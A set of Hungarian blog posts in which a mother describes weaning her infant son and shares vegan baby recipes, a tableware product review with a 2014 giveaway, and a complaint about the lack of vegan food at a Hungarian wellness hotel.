Azt hiszem a legszebb dolog a világon, amikor a saját gyermekünket látjuk, amint jóízűen elfogyasztja azt az ételt (él-elem), amit reggelire, ebédre vagy vacsorára tálalunk neki. Egyszerűen imádom nézni Ádit, amint tolja be az apró falatokat a szájába az ujjacskáival vagy az egész tenyerével… aztán meg a kanállal, amit a szájához emelve ide-oda forgatva berak a szájába (vagyis nem marad sok a kanálon). Csak ámulok-bámulok, hogy milyen bélpoklos és mennyi tud enni! Hihetetlen mennyi étel belefér ebbe a kicsi testbe. Persze voltak nehezebb napok néhány hónappal ezelőtt, amikor ugrabugrálni, énekelni kellett, hogy az első falatot betoljam a szájába. Onnantól kezdve aztán evett, de mire az első falattal sikerült a szájába találnom, eltelt vagy 6-8 perc. Nem arról volt szó, hogy nem éhes, csak egyszerűen akkor a sztrájk korszakát élte… el is voltam kicsit keseredve, hogy mi ilyenkor a teendő. Aztán egyszerűen elmúlt ez a korszak is (kb. 8-10 napot tartott). Szóval most örülök, hogy jó az étvágya, nem válogat és mindent megeszik, amit tálalok neki. Kakukkfüves cukkini főzelék pirított polenta falatokkal Számomra az is fontos, hogy miben tálalom az ételt és milyen miliőt tudok teremteni Ádinak, hogy jól érezze magát. Étkezőasztal híján nagy közös evések még nincsenek, de mindig mellette vagyok (vagyunk), amikor étkezés van. Sőt néha Ádi etet engem, élvezi, hogy a számba tehet néhány falatot. Szóval ha már lefordulnék a székről az éhségtől, akkor Ádi megment néhány falattal. Zöldségpüré barnarizzsel Használunk bambuszból készült edénykét, kanalakat, villát, de nemrég megismerkedtünk a Skip*Hop termékekkel. A SkipHop tányérok, evőeszközök, előkék BPA és PVC mentesek. És ez miért fontos? “A BPA (Bisphenol A) az egyik legelterjedtebb műanyagipari alapanyag. Csomagoló anyagokat, műanyag edényeket készítenek belőle. A BPA-nak a szervezetre gyakorolt hatása túlzottan hasonlít az ösztrogénekéhez. A szervezetbe kerülve leköti az ösztrogénreceptorokat, de valójában persze nem hormon, ettől a szervezet összezavarodik. Mivel a nemi hormonok rengetegféleképpen alakítják a folyamatokat a szervezetben, szinte feltérképezhetetlen, hogyan torzítja fejlődésünket és működésünket. Az már biztos, hogy a fiúknál például csökkentheti a spermiumtermelést, és a lányoknál a saját ösztrogén termelését, ezáltal meddőséget, idő előtti pubertást okozhat, gyermekkorban pedig befolyásolhatja a másodlagos nemi jellegek kialakulását. A tudósok úgy gondolják, hogy szerepe lehet az elhízásban is. A BPA a szervezetből ugyan lassan kiürül, viszont a BPA-t tartalmazó cumik, cumisüvegek rendszeres használatával a Bisphenol A a cumi anyagából folyamatosan kioldódik, ezáltal pótlást biztosít, melynek így szüntelenül rossz hatása van a baba szervezetére.” (Forrás: innen.) Fontosnak tartom, hogy utánanézzünk, hogy az egyes termékek milyen anyagokból készülnek, mert sok lehet köztük ártalmas. Szerencsére egyre több, babáknak termékeket gyártó cég, figyel oda ezekre a dolgokra is és olyan alapanyagokat használnak a termékeik készítéséhez, amelyek biztonsággal használhatók. Tökfőzelék bab-zab fasírttal A Skip*Hop termékek elnyerték nagyon a tetszésünket. Az előke nagyon praktikus, mert van egy kis zsebe alul, ami felfogja a kiszóródó ételt. Mosógépben mosható, bár én csak szivaccsal átdörzsölöm, lemosom és a következő étkezésig meg is szárad. Ezenkívül össze is lehet hajtogatni és a zsebbe forgatni, így könnyen szállítható. A kis tálka kiváló folyékonyabb ételek tálalására, vagy a reggeli kására; a két részre osztott lapos tányérba pedig mindig két- vagy háromféle ételt teszek, így könnyen elkülöníthetőek a különböző fogások, az ételek textúrája, színe, állaga. A kanál feje nekünk kicsit nagy, még nehezen teszi be Ádi a szájába; a villát pedig még csak nézegette… óvatosan bánok vele, csak később adom a kezeibe. A termékeken különböző állatfigurák jelennek meg és lehet különböző szetteket összeállítani a kedvenc állatok, színek szerint. És akkor jöjjön néhány recept… Pirított polenta falatkák (Dóra könyvéből, kicsit módosítva) Hozzávalók: - 60 g kukoricadara - 250 ml víz - 1 gerezd fokhagyma, felaprítva - kevés rizstej - extra szűz olívaolaj Egy kis lábasban felforraljuk a vizet. Forráskor beleöntjük a kukoricadarát és a fokhagymát és mérsékelt lángon folyamatosan kevergetjük. Kb. 10 percig főzzük, amíg besűrűsödik és megdagad. Kevés rizstejet adhatunk hozzá főzés során, hogy édesebb, krémesebb legyen kicsit az íze. Tálalhatjuk így azonnal, én azonban a polentát kiöntöttem egy lapos tányérra kb. 1 cm vastagon és hagytam 20-30 perc alatt megdermedni. Ekkor különböző formájú szaggatókkal falatnyi formákat vágtam ki belőle és teflonserpenyőben egy kevés olívaolajon megpirítottam mindkét oldalukon. Kakukkfüves cukkini főzelék Hozzávalók: - 1 db közepes méretű zsenge cukkini, meghámozva, kimagozva, lereszelve - néhány levélke friss vagy késhegyni szárított kakukkfű - 1 kis fej vöröshagyma, felaprítva - 1 evőkanál zabliszt - kevés rizstej - extra szűz olívaolaj Egy lábasban kevés olívaolajon dinszteljük meg a vöröshagymát. Pár perc múlva adjuk hozzá a kakukkfüvet, majd a lereszelt cukkinit. Fedő alatt pároljuk kb. 10 percen keresztül. A zablisztet keverjük simára egy kevés rizstejjel és öntsük a cukkinihez. Ha szükséges, még hígítsuk a főzeléket vízzel és rizstejjel és ezután hagyjuk egy kicsit besűrűsödni. Bab-zab fasírt (Anna receptjét használtam és ezt módosítottam egy kicsit, a teljes adagot megcsináltam, ami nagyon nagy mennyiség, de nagy részét lefagyasztottam, hogy bármikor elő tudjak kapni néhány darabot a mélyhűtőből, ha valami feltétre van szükség) Hozzávalók: - 125 g zabpehely, langyos vízbe áztatva 30 percre - 1 konzerv bab, lecsöpögtetve, pürésítve (villával vagy robotgépben) - 80-100 g teljeskiörlésű zsemlemorzsa - 1 fej vöröshagyma, felaprítva - 3 gerezd fokhagyma, felaprítva - 2 közepes répa, felaprítva - 1 petrezselyemgyökér, felaprítva - néhány szál petrezselyem, felaprítva - 1 evőkanál citromlé - 1 teáskanál rozmaring - késhegynyi só - olívaolaj A beáztatott zabpelyhet szitán csöpögtessük át és nyomkodjuk is ki belőle a felesleges vizet. Én robotgépben aprítottam fel egyszerre a vöröshagymát, fokhagymát, répát és petrezselyemgyökeret, így elég sok időt megspóroltam. Egy tálban keverjük össze a zabpelyhet, a babbal, a felaprított zöldségekkel, petrezselyemmel, ízesítsük citromlével, rozmaringgal és sóval. Adjuk hozzá a zsemlemorzsát, és gyúrjuk össze, amíg formázható tésztát nem kapunk. Kis golyókat formázzunk belőle, tenyerünkkel lapítsuk le (kb. 50 Ft-os nagyságúak lettek) és egy kevés olívaolajban süssük ki a fasírtokat. Hűtőben eláll néhány napig, de érdemes lefagyasztani belőle vagy ha kisebb adagot szeretnénk készíteni, akkor a receptet legalább felezzük vagy harmadoljuk. A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie ***** NYEREMÉNYJÁTÉK!!! Nyeremény : a közelgő gyermeknap alkalmából a Skip*Hop Magyarország felajánlott egy baglyos mélytányért egy leendő szerencsés nyertesnek! Menjetek fel a Monkie oldalára és írjátok meg ide kommentben, hogy nektek melyik termék nyerte el leginkább a tetszéseteket az összes közül! Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontokért is)! Vagyis a számok (+3, +3, +10) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. a Rafflecopter giveaway Szabályok : 2014. május 25-ig lehet játszani. Eredményhirdetés 2014. május 26-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes a nyereményt személyesen veheti át a Skip*Hop Magyarországtól.
Az első születésnapi torta
Mérföldkő! Amikor egy évvel ezelőtt az első hetekben a szoptatás nehézségeivel küzdöttünk, akkor nagyon távolinak tűnt az első születésnap. Aztán pikk-pakk, álmodtunk egyet és felébredtünk Ádi első születésnapján. Ilyen gyorsan eltelt az első év! Természetesen voltak nehezebb napok és könnyebbek, néha könnyekkel, de többnyire sok-sok mosollyal, kacagással, hahotázással. Utaztunk együtt hármasban sokat – egyelőre Magyarországon -, az esetek többségében vonattal, szóval Ádi kiérdemelhetné a legifjabb, legtöbbet vonatozó kisbaba címet a MÁV-tól. Sok-sok újdonságot tanulunk mindannyian, Ádi is az életről, meg mi a szülői lét minden velejárójáról (aggódás, féltés, boldogság, büszkeség, stb.). A mai napunk csodálatosan telt. Énekeltünk, majd jött néhány apró ajándék. Aztán I. megetette Ádit egy kis kásával és gyümölccsel, amíg én elkészítettem ezt a vegán palacsintatortát. Amibe nem került természetesen cukor és egyéb más mesterséges édesítőszer. A palacsinták puhák és a banántól édesek, a “csokoládé” krém vagy nevezhetjük pudingnak, pedig egyenesen mennyei. Néhány nappal ezelőtt már elkészítettem és teszteltem Ádin. Ezt a csoki pudingot adtam neki uzsonnára. Hát, a vége az lett, hogy anya és fia együtt nyalták ki a tálat, amiben a krém elkészült. Szóval most nagyobb adagot készítettem, így maradt holnap reggelire is, csak úgy magában vagy kásával tálalva. A csokoládé azért került idézőjelbe, mert nem kakaóval készült, hanem annak “alternatív helyettesítőjével”, karobbal. Tudom, tudom, sokan nem szeretik az ízét, mert már hozzászoktunk a kakaóhoz. Azt kell, hogy mondjam, hogy nagyot csalódtam a karobban. Szuper finom lett a vele készült krém, és ha a babát ehhez szoktatjuk, akkor nem fog fanyalogni, hogy milyen íze van. Aki még nem próbálta, annak üzenem, hogy nem kell megijedni, nincs borzasztó íze, csak más, mint a kakaóé. És, hogy miért érdemes fogyasztani? “A karobot a szentjánoskenyérfa terméséből állítják elő. A sötétbarna színű és kissé édeskés ízű karobport a fa hüvelytermésében található magok szárítása és őrlése révén állítják elő. A karobpor a kakaóval ellentétben nem tartalmaz teobromint, amely egy, a koffeinhez hasonlóan serkentő hatású alkaloid. A karob emellett glutén- és laktózmentes, nem tartalmaz koleszterint és nátriumszegény. A karobot így nyugodtan fogyaszthatják gyermekek, várandós és szoptató anyukák, idősek, lisztérzékenyek, tejcukorra és kakaóra érzékenyek, csontritkulásban, szív- és keringési betegségekben szenvedők, valamint köszvényes betegek is. A karob köztudottan antioxidáns hatású, gazdag vitaminokban, ásványi anyagokban és élelmi rostokban.” (Forrás: innen) Az első torta tehát vegán banános palacsintatorta lett csokoládékrémmel megkenve. Hihetetlen sikert aratott! Ádi egyszerűen megbűvölte, meggyömöszölte, szétkente, majd befalt belőle egy adagot (közben anya és apa is csipegetett kicsit belőle). Természetesen a csap alatt végeztük mindannyian, mert mindenki, és főleg Ádi, csokis lett valahol. A lakmározás és magunk rendbe szedése után pedig csodálatos napsütésben elmentünk az állatkertbe, hogy Ádi ismerkedjen kicsit az állatokkal. Ámult-bámult, vigyorgott és érdeklődve figyelte az állatokat. Estére természetesen kidőlt a sok-sok újdonságtól és izgalomtól. Hát így telt az új időszámítás szerinti 365. napunk! Boldog születésnapot kisfiunk! Nagyon-nagyon szeretünk téged! Anya és Apa És lássuk a torta bűvölést, majd a végén a receptet! “Na, vágjunk bele! Nézzük anya mit rakott össze nekem!” “Oh, la la! Ahogy a franciák mondanák…” “Húúú, ez egyre izgalmasabb!” “Nyamm!” “Anyám, add el a házat! Ez egyre finomabb!” “Anya, te egy szuper szakács vagy! Úgy szeretlek a sok finom főztödért… meg mindenért!” Az előke, ami kiállta a próbát: Monkie Vegán banános palacsintatorta csokoládékrémmel (nemcsak babáknak) Hozzávalók: Közepes méretű amerikai palacsintákhoz (kb. 8-10 db): - 2 db érett banán, villával pépesre törve - 40 g teljeskiörlésű tönkölyliszt - 60 g tönköly fehérliszt - kb. 150-200 ml rizstej (zab- és mandulatej is használható) - 1 evőkanál foszfátmentes sütőpor - 1/2 vaníliarúd kikapart magjai - kevés kókuszzsír a sütéshez A csokoládékrémhez (nagyobb adag lesz belőle): - 1 db közepes méretű érett avokádó, magja eltávolítva, húsa kikanalazva a héjából - 2 db érett banán - 2-3 evőkanál karobpor (kakaóval is lehet helyettesíteni) - 2 evőkanál mandulavaj (opcionális) - egy kevés rizstej (a megfelelő állag eléréséhez, ne legyen túl sűrű, de túl híg se, hogy tudjuk kenni) Tegyük egy mélyebb tálba a krém hozzávalóit. Botmixerrel pürésítsük simára, majd felhasználásig tegyük hűtőbe. Egy tálban keverjük össze a liszteket a sütőporral és vaníliával. Adjuk hozzá a pépesre tört banánt és rizstejet, keverjük, amíg sima, sűrű tésztát kapunk (ha túl sűrűnek találjuk, hígítsuk egy kevés mandulatejjel). Hagyjuk 5 percet állni, hogy a tészta megkeljen. Tegyünk egy kevés kókuszzsírt a teflonserpenyőbe és forrósítsuk fel. Kisebb adagot kanalazunk (2 adag is mehet egyszerre) a palacsinta tésztából a serpenyőbe, közepes lángon sütjük az egyik oldalukat, amíg aranybarnák lesznek. Megfordítjuk és a másik oldalukon is sütjük 1-2 percig. Várjuk meg, amíg kihűlnek a palacsinták, majd kenjük meg mindegyiket a krémmel és rétegezzük egymásra. Marad annyi krém, hogy akár a külsejét is bevonhatjuk vele.
Táplálj helyesen édesanyám! (2. rész)
2014. április 22. Zizi kalandjai
Bambusz tálka és kanál {Shakshuka}, konyharuha {H&M Home}, csörgő {Erdélyből} Január végén írtam az első részt és azóta sokan jeleztétek, hogy várjátok már a második részt. Annyi információ és tapasztalat kering a fejemben, azt sem tudom hol kezdjem. Igyekszem részekre bontani, hogy könnyen átlátható legyen. Továbbra is jelzem, hogy a leírtak a saját tapasztalataimból fakadnak és tájékoztató jellegűek. Mindenki kérje ki az anyukája, nagymamája, védőnője, gyermekorvosa tapasztalatait is, meg okosodjunk könyvekből is és ahogy említettem, cselekedjünk aszerint, amit a szívünk diktál. Január végén majdnem 9 hónapos volt Ádi, most meg már majdnem 12 hónapos. Ezalatt az idő alatt sok minden történt a táplálkozás terén (is)… haladjunk szép sorjában. Receptek pedig a bejegyzés végén! Zöldségek A hozzátáplálást ősszel kezdtük, így a szezonalitást követve az alábbiakat kóstolta meg szépen sorban Ádi: répa, sütőtök, cékla, paszternák, zeller, petrezselyemgyökér. Nagyjából ez volt a választék, de leginkább répa, paszternák és sütőtök volt a nyerő hármas. Aztán kb. 9,5 hónapos kortól kipróbáltuk a spenótot (sikerült friss bio spenótot szereznünk a piacon). Egész jól fogadta, csak magában kevés vízzel megpárolva, majd a végén egy kis mandulatejet hozzáöntve pépesre turmixoltam. Néhány nappal később sütőtök-paszternák kombóhoz adtam spenótot harmadiknak. Így is ízlett neki. Aztán persze volt olyan, hogy nem tetszett neki magában a spenót, szóval tartottam néhány nap szünetet, majd újra próbáltam és csodák csodájára, ízlett. 10 hónapos kora után kipróbáltam a csicsókát is, amit csak vízben magában puhára pároltam és összeturmixoltam. A csicsókának nem szeretem az illatát, az ízét is csak levesben más zöldségekkel, fűszerekkel összefőzve. Hát, Ádinak bejött totál natúran megfőzve. Utána kevertem neki almával, sütőtökkel, répával, mikor mi volt itthon. Örültem, hogy végre találtam egy új szezonális zöldséget és kicsit bővíthettem a menüt. Bár lehet, hogy csak én untam már az eddigieket és Ádi még nem. 10,5 hónapos korától aztán készítettem neki zöldség krémlevest, amibe került répa, karfiol, vöröshagyma, ezt megfőztem, egy csipet sót tettem bele és pürésítettem. A vöröshagyma ebben az esetben igen jó “fűszernek” bizonyult, ez már alapból egy olyan leves volt, amit én is szívesen ettem. Ebben az időszakban adtam neki kipróbálásra bio uborka karikát (meghámozva) rágcsálni és egy kevés lucernacsírát. Az uborka jól jön fogzás idején, mert hűti a fogínyt, csak óvatosan bánjunk vele, hogy ne harapjon le belőle túl nagy darabot a baba, szóval érdemes mindig résen lenni. A csírából persze a fele a földön végezte, de azért valamennyi jutott Ádi szájába is. Előke {Franck & Fischer a Monkie-tól} Egyszer főztem magunknak fokhagymás paradicsomos (konzerv hámozott paradicsomból – igen, tudom, hogy a paradicsom gyümölcs, de most a leveleskel/spenót paradicsomos tészta miatt a zöldségek közé került) tésztát, amibe pirítottam leveleskelt is, csak egy kis sót tettem bele és amikor kész volt, kivettem belőle egy adagot Ádinak, a maradékot pedig befűszereztem magunknak. Ádi adagját pürésítettem és így ette, de persze nem ette meg mindet első alkalommal. Készült ugyanez csak leveleskel helyett spenótot főztem a paradicsomos szószba. A zöldség krémleveseket ebben az időben elég gyakran variáltam, volt, hogy répa, petrezselyemgyökér, póréhagyma, fokhagyma és spenót került bele. Igen, finom volt, Ádinak is bejött. 11 hónapos kora után, amikor már nagyon untam a szezonális zöldségeket, akkor úgy éreztem muszáj újítanom és fagyasztott zöldborsóból főztem Ádinak krémlevest. Nagyon bejött neki. Sőt nagy adagot főztem és nekünk is ez volt az ebédünk. Aztán kevertem a zöldborsót is más zöldségekkel, majd a spárga piacokon való megjelenésekor kaptam az alkalmon és kipróbáltam a spárgát is, persze csakis más zöldségekkel és egy csipet sóval összefőzve, majd pürésítve. Néha-néha kapott még egy kis salátát, amit többnyire tőlünk kuncsorgott el, amikor látta, hogy azt eszünk. Ja és a múltkor elkezdett rágcsálni egy szál zsenge tavaszi újfokhagymát! Ízlett neki! Itt tartunk most zöldség téren… várom már a tök, cukkini, brokkoli, padlizsán, paprika és paradicsom szezont! Gyümölcsök Elég sokáig Ádi csak almát evett, majd 10 hónapos kora körül bevezettük nála a körtét is. Nagyon szereti mindkét gyümölcsöt. Eszi nyersen is magukban, kásákhoz keverve, valamint az almából levest (de nevezhetjük kompótnak) is főztem neki. Cumisüveg {Lifefactory} 10,5 hónapos kora után, amikor a szoptatást kicsit csökkenteni kezdtem és növelni kellett a folyadék fogyasztást, akkor ebéd után fél órával adtam neki kifilézett narancsot (Lidl-ben lehet kapni bio, kezeletlen héjú narancsot elég jó áron). Az édes, szaftos, lédús narancs falatkákat imádja, nem tud betelni vele. Háromszor pedig adtam neki bio banánt, amit szintén nagyon szeret. 11 hónapos kora után pedig adtam neki finom érett avokádót. Sikerült “ready-to-eat” avokádóhoz jutnom, amely annyira, de annyira finom, hogy magában só, fűszerek nélkül is eteti magát. Természetesen Ádinak is bejött. Gabonák, glutén, pékáru 10 hónapos koráig csak gluténmentes gabonákat főztem Ádinak: kölest, barnarizst és hajdinát. Ezeket főztem meg (kb. három evőkanálnyi elég két étkezésre) bő vízben és puha, kásás állagúra készítettem. Én soha nem adtam magában – noha lehetne -, mindig zöldségpüré vagy például az almaleves mellé adtam. 10 hónapos kora után kapott először glutént tartalmazó ételt. Főztem neki tésztát és ezt spenóttal, zöldségkrémmel, spenótos paradicsomszósszal tálaltam. Ádinak mindegyik változat ízlik. Magyar tésztát választottam – egy barátnőm, Adri javaslatára -, amely nagyon gyorsan megfő és természetesen tojásmentes (a csomagolására nincs ráírva, de a weboldalon szerepel, hogy nyomokban tartalmazhat tojást… remélem azért, hogy nem!). A tésztát jó puhára főzöm és apró darabkákra vágom, erre szedem rá a zöldséges szószt. Ádi szeret nyammogni a tészta darabkákon, de egyébként a főtt tésztát is lehetne pürésíteni, de én nem tettem, ahogyan a főtt gabonákat sem. 10,5-11 hónapos kora körül adtam neki először pékárut. A Piszkei Ökonál vettem teljeskiörlésű élesztő nélküli tönkölybúza kiflit, amit karikákra és apró falatokra vágtam és vagy avokádóval vagy anyukám cukormentes szilvalekvárjával kentem meg. Ez kiváló étel uzsonnára. Ezenkívül a Lét-Reform pékségnél szoktam venni teljeskiörlésű élesztő nélküli cukormentes meggyes, szilvás vagy almás rétest. Apró falatokra tépkedem Ádinak és így eszi meg néha reggelire, de többnyire ebéd után desszertnek vagy uzsonnára. Sütöttem már neki baba palacsintát is, amelyben almapüré, rizstej és zabliszt van. Első alkalommal reggelire készítettem és az apró palacsintákból megevett három darabot. Második alkalommal pedig uzsonnára készült. Odaadtam neki egy egészet, de csak forgatta, úgyhogy inkább én tépkedtem kicsi falatokra és tettem a szájába. Nyelte, mint kacsa a nokedlit. Gyorsan összedobható és ha megyünk valahova, akkor is könnyen magunkkal tudjuk vinni. Arról nem is beszélve, hogy szerintem minden gyerek szereti. 10 hónapos kora előtt rizspehelyből, 10 hónapos kora után már zabpehelyből is főztem neki kását reggelire. Általában reszelt almát vagy körtét keverek hozzá és így adom Ádinak. Sokszor együtt főzzük a miénkkel, így már mi is megszoktuk, hogy teljesen cukormentes együk a kását, csak egy kis gyümölccsel édesítjük és nekünk is nagyon bejön. Ezeken kívül főzök kását teljeskiörlésű tönkölydarából is (ebből vagy ebből). Folyadék Az anyatejen kívül többnyire szűrt vizet vagy forrásvizet adok Ádinak. Iszik cukormentes bio meggylevet és rizstejet. Mandulatejet ivásra még nem kapott, de van, hogy ezzel készítem a reggeli kásáját, tehát kipróbálta már. Nagyon oda kell figyelni, hogy az anyatej csökkentése után igyon eleget, így napközben minden órában igyekszek megitatni vele egy kevés folyadékot. Zsiradék Közvetve nem adok, de pároltam már vöröshagymát, fokhagymát hidegen sajtolt extra szűz olívaolajon, a palacsintákat pedig nagyon kevés kókuszszírban szoktam megsütni. Fűszerek Amit eddig használtam: fahéj (almaleveshez, reggeli kásákhoz) és zöldfűszerek (kakukkfű, bazsalikom). Bolti bébiételek Ahogy korábban említettem, tartok itthon vészhelyzet esetére bio bébiételeket (sütőtök almával, alma, körte, körte csipkebogyóval, répa, őszibarack), arra az esetre, ha minden összejön és nincs időm főzni vagy valami, amit főztem és nem ízlik Ádinak (mostanában nem történik ilyen), akkor legyen helyette gyors alternatíva. Jól olvassátok el mindig az összetevőket, hogy ne legyen benne cukor! Tárolás Én többnyire egy napra vagy két napra főzök egy ételt Ádinak. Hűtőben tárolom maximum két napig, de mielőtt odaadnám neki az előző napos ételt, mindig megkóstolom, hogy jó-e még! Természetesen le is lehet fagyasztani például jégkockatartókba téve, de mivel nekem nagyon kicsi a mélyhűtő fakkom, ezért mindig frissen főzök ebédet és nem fagyasztok le megmaradt adagokat. ***** És akkor jöjjenek a receptek… Ádi eléggé haspók mostanában, szóval a mennyiségek az ő adagját tükrözik. Lehet, hogy más babának ez több étkezésre elég, de az is elég, hogy kevesebbre, mert még nagyobb haspók, mint Ádi! Spenótpüré Hozzávalók: - 1 nagy marék spenót - kevés víz - 2-3 evőkanál mandula- vagy rizstej - ha már fűszerezünk, akkor csipet só és 1 gerezd fokhagyma, felaprítva Egy lábasban pároljuk össze a spenótot a fokhagymával és a vízzel. Sózzuk. Adjuk hozzá a mandulatejet és pürésítsük simára. Ezt adhatjuk magában vagy tésztával, kölessel, barnarizzsel tálalva. Almás baba palacsinta Hozzávalók kb. 5 darabhoz: - 3 evőkanál frissen reszelt almapüré - 2 evőkanál rizstej - 5 evőkanál zabliszt - 1 teáskanál kókuszzsír Egy tálban keverjük össze az almapürét a rizstejjel. Adjuk hozzá a lisztet. Sűrű “tésztát” kell kapnunk. Egy teflonserpenyőt hevítsünk fel, olvasszuk fel a kókuszzsírt és kanalazzunk (evőkanálnyi) adagokat a tésztából a serpenyőbe. Kanállal lapítsuk kerek formára és süssük, amíg megbarnul és könnyen átfordítható lesz. Süssük a másik oldalukon is néhány percig a palacsintákat. Zöldborsó krémleves Hozzávalók: - 1 bögre zöldborsó - 1/4 darab vöröshagyma, felaprítva - 1 gerezd fokhagyma, felaprítva - csipet só - víz - mandulatej vagy rizstej - 2 teáskanál extra szűz olívaolaj - kevés kakukkfű (opcionális) - 1/2 marék spenót (opcionális) Egy lábasban hevítsük fel az olívaolajat és pároljuk meg a vöröshagymát és fokhagymát néhány perc alatt. Adjuk hozzá a zöldborsót, öntsük fel annyi vízzel, amennyi éppen ellepi. Sózzuk és főzzük a borsót puhára. Ha elkészült pürésítsük simára és hígítsuk egy kevés mandula- vagy rizstejjel. Én úgy szeretem, ha elég sűrű, mert így könnyebb Ádi szájába kanalazni. Néhányszor adtam már hozzá friss spenótot, amit a főzés végén adtam hozzá, majd ezzel együtt pürésítettem. Többnyire adok hozzá valamilyen főtt gabonát. Rizs- vagy zabpehely kása Hozzávalók 1 adaghoz: - 3 evőkanál rizs- vagy zabpehely - 1 alma vagy körte, meghámozva, lereszelve - mandula- vagy rizstej - 1 teáskanál mandulavaj (opcionális) - csipet fahéj Tegyük a lábasba a rizspelyhet annyi rizstejjel, amennyi ellepi. Ha főzés során nagyon besűrűsödik, akkor adjunk még hozzá egy kevés tejet. Mielőtt elzárjuk a gázt adjuk hozzá a fahéjat és a mandulavajat. Tálaláskor keverjük hozzá a reszelt almát vagy körtét. Tönkölykása Hozzávalók 1 adaghoz: - 3 evőkanál tönkölydara - 1 alma vagy körte, meghámozva, lelreszelve - mandula- vagy rizstej - csipet fahéj Tegyük egy lábasba a tönkölydarát a mandulatejjel és fahéjjal. Főzzük sűrű kása állagúra. Tálaláskor keverjük hozzá a reszelt almát vagy körtét. Almaleves (vagy almaszósz, amit “kenyérre kenni nem lehet” ) Hozzávalók 2-3 adaghoz: - 2 közepes alma, meghámozva, kicsumázva, apró kockákra felvágva - 100 ml víz - kb. 200-300 ml rizs- vagy mandulatej - 1 evőkanál tápióka keményítő - csipet fahéj - 1/2 evőkanál frissen facsart citromlé Ezt a levest soha nem tudom egyforma állagúra főzni, hol sűrűbb, hol pedig hígabb (majd ti is kitapasztaljátok). Tegyük fel a vizet egy lábasban forrni. Közben a felkockázott almát szórjuk meg fahéjjal és locsoljuk meg a citromlével, keverjük össze és adjuk a vízhez. Vegyük takarékra a lángot és fedő alatt pároljuk az almát puhára. Öntsük hozzá a rizstejet és főzzük tovább. A tápióka keményítőt keverjük simára egy kevés rizstejjel és adjuk a leveshez. Hagyjuk egy kicsit besűrűsödni és tálaljuk (én főtt kölest vagy barnarizst szoktam mellé adni). ——————————– A bejegyzést nem támogatta egyik cég sem! A linkeket azért szúrtam be, mert a termékeket nagyon jónak tartom és úgy gondolom érdemes másoknak is kipróbálniuk.
Új védjegyet vezettek be a magyar zöldségre és gyümölcsre
Megkezdték a Vitaricum védjeggyel jelölt minőségi magyar zöldség és gyümölcs árusítását, elsőként a CBA boltjaiban. Az idei zöldség és gyümölcs szezon korán indult, és jónak ígérkezik.
Wellness hétvége – Mit együnk a magyarországi szállodákban, ha nem hagyományos táplálkozást folytatunk?
A múlt héten elutaztunk kipihenni ( röviden) az elmúlt három hónapot, amely elég stresszes és sok munkával teli volt. Minden vágyam az volt, hogy pihenjek, kiszolgáljanak, most főzzenek rám is és kiránduljunk, pihenjünk, fürödjünk. Általában ha elutazunk viszem magammal a fél konyhát, most viszont úgy gondoltam, hogy egy négy csillagos wellness szállodában mégiscsak találok valamit az étlapon amit ehetek. Vegán vagyok: nem eszem húst, tejet, tejterméket, tojást, fehér lisztet, fehér cukrot, élesztőt, ecetet és mindent amiben a felsoroltak szerepelnek. A wellness meg volt, mert éhesen jöttem haza és megfogadtam legközelebb mégiscsak vinni fogok néhány harapnivalót. Kezdeném a reggelivel: minden volt amit egy hagyományos táplálkozáson lévő személy találhat magának: rántotta, sült kolbász, virsli, vaj, lekvár, cukrozott levek, kávé, cukrozott, színezett gabona pelyhek, tej, joghurt és díszitésnek néhány szem gyümölcs, 1-2 db banán. Ők lettek az én reggelim: a díszítés:)! Beértem volna egy kevés szója tejjel és natur zabpehellyel. Egy dolgot vittem magammal, egy liter rizs tejet és a lúgos,-ganodermás kávémat, amit magammal vittem a reggelihez. Az ebéd szintén a szállodában volt. Vegák számára semmit nem kínáltak. Volt viszont rántott gomba, rántott sajt majonézzel és idény salátával ami náluk: ecetes csalamádé. Kértem a konyháról vegyes nyers zöldségeket és hidegen sajtolt olíva olajat. A pincérnő úgy nézett rám, mint aki más bólygoról érkezett:). Rántott gombát ettem bunda nélkül a zöldségekkel, rizi bizivel, ami természetesen hagyományos fehér rizs volt, de ezzel már nem is foglakoztam. Vacsorát a városban töltöttük, az egyik leg felkapottabb étteremben. Itt is rántott sajt, gomba és karfiol volt a vegetáriánusok számára. Megint köretet ettem: grillezett zöldségeket, párolt rizzsel ( ami mirelit zöldség volt kissé lepirítva), de ízletes volt számomra mivel az egész délutános kirándulás és szauna után éhes voltam. Szemeztem a halételekkel is, mert ilyen esetben néhányszor megszegem a vegánságot hallal, mert inkább fogyasztok valamilyen jó mínőségi grillezett halat: lazacot, pisztrángot zöld körettel, salátával, mint rántott sajtot, tejterméket. A hal “tengeri ” volt és pangasius, azt nem enném és nem is ajánlom senkinek, hogy fogyassza. Másnap reggel kerestem egy zöldségest, Dm-et is kutattam, de nem volt ( Visegrád ), legalábbis nem találtam. Tanulság és jó tanács: ha nem szeretnénk éhesen wellneselni és pihenni, akkor igenis vinni kell majdnem a fél konyhát még Magyarországon: növényi tejet, vegán pástétomokat, bio margarint, abonett vagy csomagolt, szeletelt tönköly kenyeret, krékereket, gyümölcsöt, olajos magvakat. Ez a minimum, ne bízzuk a véletlenre. Nyílván vannak felkészültebb szállodák is, ahol gondolnak az ételallergiásokra is: tej,-glutén, de összeségében teljesen felkészületlenek és gyerek cipőben járnak ezek a szállodák, éttermek. Pedig wellness nincsen egészségtudatos táplálkozás nélkül és az nem a reggeli sült virslivel és rántott gombánál kezdődik!
Kedvenc helyeim Budapesten
2014. március 14. Zizi kalandjai
